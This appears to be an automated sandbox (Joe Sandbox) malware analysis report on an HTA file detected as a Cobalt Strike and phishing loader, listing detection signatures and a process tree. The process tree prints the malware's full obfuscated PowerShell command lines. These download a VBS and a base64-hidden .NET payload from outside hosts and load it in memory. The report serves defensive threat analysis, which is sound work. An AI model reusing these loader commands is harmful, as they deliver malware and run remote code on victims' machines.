Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seemebestthings.hta

Overview

General Information

Sample name:seemebestthings.hta
Analysis ID:1564725
MD5:b89e0d07bac575aa9381611fa00ea4a0
SHA1:53a71effb8401e97f8e8e1f2522a0289e2b58745
SHA256:6bfa3b21293ad79037e13886fd6b0b3c0ee8afdc1422ba2748ade815db010aa7
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7328 cmdline: mshta.exe "C:\Users\user\Desktop\seemebestthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7400 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7452 cmdline: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7672 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
seemebestthings.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7728INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x7efd4:$b2: ::FromBase64String(
    • 0x1533fe:$b2: ::FromBase64String(
    • 0x154b87:$b2: ::FromBase64String(
    • 0x155309:$b2: ::FromBase64String(
    • 0x155ca0:$b2: ::FromBase64String(
    • 0x15639b:$b2: ::FromBase64String(
    • 0x40e6:$b3: ::UTF8.GetString(
    • 0x4d8a:$b3: ::UTF8.GetString(
    • 0x595d:$b3: ::UTF8.GetString(
    • 0x64d6:$b3: ::UTF8.GetString(
    • 0x6eb3:$b3: ::UTF8.GetString(
    • 0x7850:$b3: ::UTF8.GetString(
    • 0x16b65:$b3: ::UTF8.GetString(
    • 0x16f65:$b3: ::UTF8.GetString(
    • 0x17ad5:$b3: ::UTF8.GetString(
    • 0x184c1:$b3: ::UTF8.GetString(
    • 0x18e5e:$b3: ::UTF8.GetString(
    • 0x19ae2:$b3: ::UTF8.GetString(
    • 0x33fdc:$b3: ::UTF8.GetString(
    • 0x3496e:$b3: ::UTF8.GetString(
    • 0x4464a:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 7864JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7864INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x4ec:$b2: ::FromBase64String(
      • 0x13d1:$b2: ::FromBase64String(
      • 0xa6c9:$b2: ::FromBase64String(
      • 0xadb2:$b2: ::FromBase64String(
      • 0x2ffad:$b2: ::FromBase64String(
      • 0x5de82:$b2: ::FromBase64String(
      • 0x5e58c:$b2: ::FromBase64String(
      • 0xc898d:$b2: ::FromBase64String(
      • 0xc9076:$b2: ::FromBase64String(
      • 0xf0a62:$b2: ::FromBase64String(
      • 0xf1ca8:$b2: ::FromBase64String(
      • 0xf3566:$b2: ::FromBase64String(
      • 0x11042c:$b2: ::FromBase64String(
      • 0x147016:$b2: ::FromBase64String(
      • 0x147706:$b2: ::FromBase64String(
      • 0x148056:$b2: ::FromBase64String(
      • 0x148918:$b2: ::FromBase64String(
      • 0x149048:$b2: ::FromBase64String(
      • 0x154dba:$b2: ::FromBase64String(
      • 0x1554a3:$b2: ::FromBase64String(
      • 0x156c01:$b2: ::FromBase64String(
      SourceRuleDescriptionAuthorStrings
      amsi32_7864.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
        Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
